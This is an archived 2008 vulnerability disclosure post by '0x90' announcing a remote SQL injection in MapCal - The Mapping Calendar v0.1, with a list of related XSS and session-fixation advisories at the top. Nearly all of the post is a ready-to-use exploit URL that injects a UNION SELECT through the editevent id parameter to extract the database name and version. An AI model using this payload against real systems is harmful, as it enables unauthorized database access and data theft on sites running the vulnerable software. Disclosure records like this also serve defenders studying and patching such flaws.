Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Xss In Datalife Engine CMS 7.2

[MajorSecurity Advisory #54]xt:Commerce - Cross Site Scripting and Session Fixation Issues

[MajorSecurity Advisory #53]BLUEPAGE CMS - Cross Site Scripting and Session Fixation Issues

Cross Site Scripting (XSS) Vulnerabilitiy in fuzzylime (cms) >=3.02, CVE-2008-3098

From:	Guns_(at)_0x90.com.ar <Guns_(at)_0x90.com.ar>
Date:	24.09.2008
Subject:	MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

      _____          ____   _____
     /  _  \ /\  /\ / _  \ /  _  \
     | | | | \ \/ / ||_| | | | | |  
     | | | |  \  /  \_   | | | | |  
     | |_| |  /  \   __\ | | |_| |
     \_____/ / /\ \ |____/ \_____/
             \/  \/

[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: MapCal - The Mapping Calendar

[~] site: http://mapcal.sourceforge.net

[~] Vulnerability Class: SQL Injection



[~] Exploit:

http://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,
0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events